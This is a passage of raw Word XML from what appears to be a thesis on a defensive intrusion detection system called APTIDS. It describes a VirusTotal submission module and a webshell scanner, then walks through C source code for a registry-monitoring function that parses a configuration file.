    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F29DA" w:rsidRPr="00D11FED" w:rsidRDefault="009F29DA" w:rsidP="00F30840">
      <w:r>
        <w:t>This module helps in rapidly submit a suspicious file to virustotal via using HTTP query method, which implemented in available open API provided by Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00DB15A5" w:rsidP="00F30840">
      <w:r>
        <w:t>Scaning websh</w:t>
      </w:r>
      <w:r w:rsidR="00C973CF">
        <w:t xml:space="preserve">ell based on webshell detector </w:t>
      </w:r>
      <w:r>
        <w:t>(shelldetector.com), which identify web app files that contain malicious code via detecting known string, file name and file signature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB15A5" w:rsidRDefault="00DB15A5" w:rsidP="00F30840"/>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F30840" w:rsidRDefault="00994B42" w:rsidP="00F30840"/>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00F30840">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRPr="00CA1AEF" w:rsidRDefault="00E2646F" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc485303744"/>
      <w:r w:rsidRPr="00CA1AEF">
        <w:lastRenderedPageBreak/>
        <w:t>IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:r w:rsidRPr="00CA1AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95E8E" w:rsidRDefault="00A95E8E" w:rsidP="00E445CE">
      <w:r>
        <w:t xml:space="preserve">In the previous </w:t>
      </w:r>
      <w:r w:rsidR="00A81747">
        <w:t>chapter,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we have discussed about the architectures and workflows of APTIDS, DLCH and CLSS. In this chapter, we will get into source code dissection and analyze functions within each module. Furth</w:t>
      </w:r>
      <w:bookmarkStart w:id="96" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r>
        <w:t>ermore, we will demonstrate how we test our implementation of APTIDS, DLCH and CLSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00A95E8E" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="97" w:name="_Toc485303745"/>
      <w:r>
        <w:t>APTIDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="00A95E8E" w:rsidRDefault="00A95E8E" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc485303746"/>
      <w:r>
        <w:t>Registry Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00910D7B">
        <w:t xml:space="preserve"> module’s source code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="00910D7B" w:rsidP="00910D7B">
      <w:r>
        <w:t>On running at startup, APTIDS.exe called a function named “RegMon” for performing Registry Monitoring task.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910D7B" w:rsidRPr="007D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4BC6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RegMon</w:t>
      </w:r>
      <w:r w:rsidR="00910D7B" w:rsidRPr="007D4BC6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B04F7" w:rsidRDefault="00910D7B" w:rsidP="008625D0">
      <w:r>
        <w:t>RegMon firstly reads</w:t>
      </w:r>
      <w:r w:rsidR="00F77C71">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the configuration file</w:t>
      </w:r>
      <w:r w:rsidR="00F77C71">
        <w:t xml:space="preserve"> named “RegConfig.conf”,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which stores the Registry keys for monitoring. RegMon checks whether the configuration file exist or whether it does not contain null, then reads its content and store in a PCHAR variable called “lpBuffer”.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>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RegMon(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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LPCSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> szRegConfig = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Config/RegConfig.conf"</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hFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">szRegConfig, </w:t>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0,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OPEN_EXISTING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0,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dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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 xml:space="preserve">dwErrorCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_FILE_NOT_FOUND</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"Cannot open Registry Configuration file: ERROR_FILE_NOT_FOUND !\n"</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dwResult, dwByteRead;</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lpBuffer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color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hFile, lpBuffer,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xml:space="preserve">, &amp;dwByteRead,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dwByteRead == 0){</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"Registry Configuration file contains NULL !\n"</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7D4BC6" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="004A4D8F" w:rsidP="007D4BC6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>RegMon generate a separate thread for monitoring each registry key read in the con</w:t>
      </w:r>
      <w:r w:rsidR="00A81747">
        <w:t xml:space="preserve">figuration file. Therefore, we </w:t>
      </w:r>
      <w:r w:rsidR="007E611D">
        <w:t>declare</w:t>
      </w:r>
      <w:r w:rsidR="00A81747">
        <w:t xml:space="preserve"> three arrays and a thread counter.</w:t>
      </w:r>
      <w:r w:rsidR="007E611D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007E611D" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“pRegKey” array is declared for storing an array of REGKEY structs, which are used to store the registry key as argument passed to the thread function. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007E611D" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“hThreadArray” is used for storing an array of threads created the</w:t>
      </w:r>
      <w:r w:rsidR="007D4BC6">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="007E611D" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“dwThreadIdArray” is used for storing thread ID numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B04F7" w:rsidRDefault="007D4BC6" w:rsidP="007D4BC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“iThread” is used for counting the number of current executing threads created by</w:t>
      </w:r>
      <w:r w:rsidR="007E611D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>RegMon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="003416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720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> pRegKey[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_REG_THREADS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="00A81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dwThreadIdArray[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_REG_THREADS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="00A81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hThreadArray[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_REG_THREADS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81747" w:rsidRDefault="00A81747" w:rsidP="00A81747">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>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iThread = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="00C258C6" w:rsidP="00B0640C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The Reg</w:t>
      </w:r>
      <w:r w:rsidR="006B6E8A">
        <w:t xml:space="preserve">Config.conf is a configuration file using XML-like format. For reading its valuable data, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006B6E8A">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006B6E8A">
        <w:t xml:space="preserve"> read between 2 tags, which is the open tag &lt;Key&gt; and the close tag &lt;/Key&gt;, and skip all line with a starting “#” character. The registry key will be monitored is the information between these 2 tags. We process the line, read between the 2 tags and find the information needed.</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while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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pRegKey[iThread] = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PREGKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) HeapAlloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetProcessHeap(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HEAP_ZERO_MEMORY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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REGKEY</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(pRegKey[iThread] == </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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ExitProcess(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1);</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 xml:space="preserve">strstr(lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"#"</w:t>
      </w:r>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lpBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>strstr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) + strlen(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"\n"</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lpKeyStart </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)strstr((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPCSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">)lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;Key&gt;"</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lpKeyEnd </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">)strstr(lpBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;/Key&gt;"</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 xml:space="preserve">lpKeyStart ==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 lpKeyEnd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lpKeyStart += strlen(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;Key&gt;"</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pRegKey[iThread]-&gt;stlpKey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color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</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lpKey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color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</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strncpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> *) lpKey, lpKeyStart, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)(lpKeyEnd - lpKeyStart));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00B0640C" w:rsidRDefault="002565A7" w:rsidP="00B0640C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
